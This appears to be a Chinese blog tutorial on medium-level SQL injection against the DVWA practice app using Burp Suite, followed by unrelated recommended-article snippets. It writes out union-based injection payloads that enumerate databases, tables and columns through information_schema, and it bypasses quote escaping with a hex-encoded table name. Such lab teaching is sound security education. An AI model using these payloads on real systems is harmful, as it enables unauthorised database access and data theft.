sql 数组_sql注入中级

最新推荐文章于 2022-10-27 19:00:29 发布
最新推荐文章于 2022-10-27 19:00:29 发布
阅读量226 收藏
点赞数
文章标签: sql 数组 sql 枚举 sql 注入 sql查询id最大的一行 sql盲注如何解决

POST注入借助Burpsuite工具

将DVWA Security调到Medium

2bb24510c150cdbbb84d862e7e0110bf.png

1,查询User ID为3,点击Submit,先分析一下php源代码

329d532eeab7e046bbf7994fa83e95ed.png

a5abe0439c70f1709f5cb41f3bea5954.png

首先我们可知这是POST型,先检查一下User Id 是否为空,如果为空执行下列操作,先赋值id,然后转义在 SQL 语句中使用的字符串中的特殊字符。之后在数据库中查询数据,将结果输出给result,从结果集中取得一行关联数组赋值到row,依次输出first name,sunname。最后关闭函数。因为稍后再index.php page使用,所以我们可以在此处进行设置,以便我们可以像在其余源脚本中一样在此处关闭数据库连接

2.函数分析

(1)mysqli_fetch_row():从结果集中取得一行,并作为枚举数组返回。

ada7f3efef7746355c6840318a0711e8.png

(2)mysqli_real_escape_string():转义在 SQL 语句中使用的字符串中的特殊字符。

其余函数在初级文档说明,在此篇不做重复阐述

157109587e041031289dc06e8350f01f.png

3.进行实际操作

在bp软件中,当USER ID=3时,出现如下界面,为了方便,我们把他转到Repeater下,点击Action,然后Send to Repeater

3e0528625e58ffbfbf04820e9a06c013.png4fd4744e623530871e67dc0c91f9e3af.png

在箭头指向部分将id=3改为id=3’,然后点击Go

在id=3’时会出现如下错误,这是因为有转义字符\,单引号失效,需要进行绕过,后续会讲怎样绕过。

9dd76a32754f3185fda7b35d1d7c2cdd.png5a2731f37db6c2bb8ad1d188aa5234e6.png

sql语句查询列数,在箭头那输入id=3 order by 2后点击Go,出现右面的结果

d67270b26b60d53b259707c18848fb13.png02f047154c1c2d7cb8efebf3c8cee803.png9f6c6cf5319cbbf3daf9aadede4a0d0c.png

sql语句查询位置输入id=3 union select 1,2#

9afdc54ec86b04ff94d5de1dbf186ece.png

sql语句查询数据库名3 union select database(),2#

f93c3538e82d334afd3aca678c4494d6.png54092e339f889146ea8bf5d9b7a2e3f8.png

sql语句查询数据表名3 union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#

b0256e3a1ed152f89f8967977c7da288.png

查询user表中列名

(对方使用转义字符屏蔽’ , “等特殊字符,使用绕过方法,可以使用users对应的ascii码进行绕过)id=3 union select group_concat(column_name),2 from information_schema.columns where table_name =’users’#

如何找users的ASCII,在Decoder中的Encode as 下找到ASCII hex就可出下面的

576f989e9f926daaa3bba84b51fae293.pngcf9ff077df68b767927c84286a84e507.png

id=3 union select group_concat(column_name),2 from information_schema.columns where table_name =0x7573657273#

018f856c511173e84a003726e76314cc.png

获取数据

6fc2f7c90228722c298b922dd658a23f.png

本文介绍的是中级SQL注入,将持续更新SQL注入高级以及盲注,欢迎大家点赞和收藏,您的支持是我创作的最大动力!

weixin_39640909
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
中级软件设计师电子档案
04-24
10. **软件安全**:理解常见的安全风险,如SQL注入、跨站脚本攻击等,掌握安全编码实践,如OWASP Top 10安全漏洞清单。 11. **通信协议与网络基础**:理解TCP/IP协议栈,熟悉HTTP/HTTPS协议,以及RESTful API设计,...
sql数组
Dreamaple
08-27 6790
T-SQL数组一样处理字符串、分割字符串 在日常的编程过程中,数组是要经常使用到的。在利用SQL对数据库进行操作时,有时就想在SQL使用数组,比如将1,2,3,4,5拆分成数组。可惜的是在T-SQL中不支持数组。不过还是有变通的办法。我们可以自己编写两函数Get_StrArrayLength(取得字符串的长度-元素的个数)和Get_StrArrayStrOfIndex(按指定符号分割字符串...
SQL实现数组的形式
老九的博客
07-24 1万+
--根据分隔符判断个数 CREATE FUNCTION Get_StrArrayLength ( @str varchar(5000) , --要分割的字符串 @split varchar(10) --分隔符号 ) RETURNS int AS BEGIN DECLARE @location INT DECLARE @start INT DECLARE @len...
sql array 数组基本用法(一)
luoganttcc的博客
09-05 1万+
SELECT [1, 2, 3] as numbers; SELECT ["apple", "pear", "orange"] as fruit; SELECT [true, false, true] as booleans; SELECT [a, b, c] FROM (SELECT 5 AS a, 37 AS b, 406 AS c); SELECT [a, b, c] FROM (SELECT CAST(5 AS INT64) AS a,
sql 查询嵌套数组
luoganttcc的博客
07-22 1888
查询嵌套数组 如果一个表包含 STRUCT 的 ARRAY,则可展平 ARRAY 以查询 STRUCT 的字段。您也可以展平 STRUCT 值的 ARRAY 类型字段。 查询 ARRAY 中的 STRUCT 元素 以下示例将 UNNEST 与 CROSS JOIN 结合使用,以展平 STRUCT 的 ARRAY。 WITH races AS ( SELECT "800M" AS race, [STRUCT("Rudisha" as name, [23.4, 26.3, 26.4, 26.1] a
mysql 利用sql解析数组
GDKbb的博客
04-21 2874
1、创建存储过程 delimiter // CREATE PROCEDURE `substring`(IN `array` varchar(255),IN `num` int(10),OUT `string` varchar(255)) BEGIN -- 裁剪数组为想要的元素在第一位(num 从 0 开始为第一个元素) set @startCount = -(length(`array`) - length(REPLACE(`array`, ',', '')) + 1); SET @startList
Java初中级程序员面试宝典共36页.pdf.zip
10-29
4. **数组与集合**:讲解数组和集合框架的区别,如ArrayList、LinkedList、HashSet、HashMap等的使用。 5. **函数与方法**:讨论函数的定义、参数传递、返回值,以及方法重载和重写。 在进阶概念部分,可能涉及: ...
java中级面试题整理
01-28
以上是Java中级面试题涉及的知识点详解,这些内容涵盖了Java程序员在实际工作中应具备的基本技能和深入理解。在准备面试时,除了掌握这些知识点,还要关注最新技术和实践应用,以便在面试中表现出全面的技能和经验。
java 初级 中级 高级 面试题
08-03
4. **数组和集合**:数组的使用,ArrayList、LinkedList、HashSet、HashMap等集合类的理解与应用。 5. **方法和函数**:参数传递,重载和重写。 6. **字符串处理**:String类的方法如substring、indexOf、trim等。 ...
Java初级中级面试题(release)
03-28
1. **基础语法**:包括变量、数据类型、运算符、流程控制(if, switch, for, while等)、数组、字符串的使用。 2. **面向对象编程**:类、对象、封装、继承、多态的概念及应用,抽象类与接口的区别,访问修饰符的...
SQL 创建数组方法
sz_bdqn的专栏
03-05 1万+
----------------------------------------------------------------------- -- 数据库 数组 ----------------------------------------------------------------------- create function myArray(@array nVARCHAR(max),@
数据库篇--SQL语句筛选“对象数组结合的数据”
m0_69920956的博客
04-21 2248
测试数据: 查询表中全部数据: select * from test 结果: 目的:筛选出listname字段中“chooseval”的值含有“NG”的数据 第一种方法: select * from test where JSON_Query(listname, '$') like '%"chooseval":"NG"%' 详解:JSON_QUERY:从SQL Server中的JSON中提取数组或字符串,此语句类似于查询含有"chooseval":"NG"的数据 第二种方.
sql server:sql操作字符串数组,知识点涵盖CHARINDEX,SUBSTRING,CAST,WHILE,IF等
橙-极纪元-cplvfx-JJY.Cheng
08-18 1723
sql server 字符串数组sql中使用,知识点涵盖CHARINDEX,SUBSTRING,CAST,WHILE,IF等 代码 DECLARE @RecordIds nvarchar(MAX),@m int,@n int,@RecordId int; --set @RecordIds='11,21,31,41' set @RecordIds='11' set @m=CHARINDEX(',',@RecordIds); set @n=1; select 所在位置下标=@m, 输出次数=1; W
Linux Shell编程及自动化运维实现之数组和函数
yiweii的博客
09-07 370
一、数组 简介: 1、数组简介 变量:用一个固定的字符串表示一个不固定的字符串。 数组:用一个固定的字符串,表示多个不固定字符串。 2、类型 普通数组:只能使用整数作为数组索引。 关联数组:可以使用字符串作为数组索引。 3、图示 总结: 变量切片有个索引的概念。一个索引(整数)对应一个字符。 普通数组:中的索引对应一个字符串。 关联数组数组中的索引可以使用字符串。 普通数组: 1、定义数组 方法一: 一次赋一个值 数组名[下标]=变量值 array1[0]=p..
T-SQL数组一样处理字符串、分割字符串
weixin_34268753的博客
08-12 232
在日常的编程过程中,数组是要经常使用到的。在利用SQL对数据库进行操作时,有时就想在SQL使用数组,比如将1,2,3,4,5拆分成数组。可惜的是在T-SQL中不支持数组。不过还是有变通的办法。我们可以自己编写两函数Get_StrArrayLength(取得字符串的长度-元素的个数)和Get_StrArrayStrOfIndex(按指定符号分割字符串,返回分割后指定索引的第几个元素)。有...
SQL语句中使用数组
finally_flx的博客
08-25 2935
XML中使用数组核心 1、用OR连接 <if test='alreadyPrintHeaderIdList != null and alreadyPrintHeaderIdList.length > 0'> AND ( <foreach collection="alreadyPrintHeaderIdList" item="planHeaderId" separator="or"> O.PLAN_HEADER_ID = #{pla
常用SQL函数
海龙的博客
10-27 3072
一些常用的sql函数,
Sql数组的定义和使用
热门推荐
月落星沉
04-24 2万+
Sql数组的定义和使用首先你需要定义一个数组类型,然后定义这个数组变量       declare       type   a_type   is   table   of   number;       --   type   a_type   is   array(10)   of   number;       --   下面一种定义方式则指定了该数组的最大元素个数        
sql server xp_cmdshell注入
最新发布
10-19
然而,xp_cmdshell也被黑客滥用,用于进行SQL Server注入攻击。 xp_cmdshell注入是一种利用SQL Server的xp_cmdshell的漏洞,通过构造恶意SQL语句来执行任意操作系统命令。攻击者可以将自己的恶意脚本嵌入到SQL查询...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值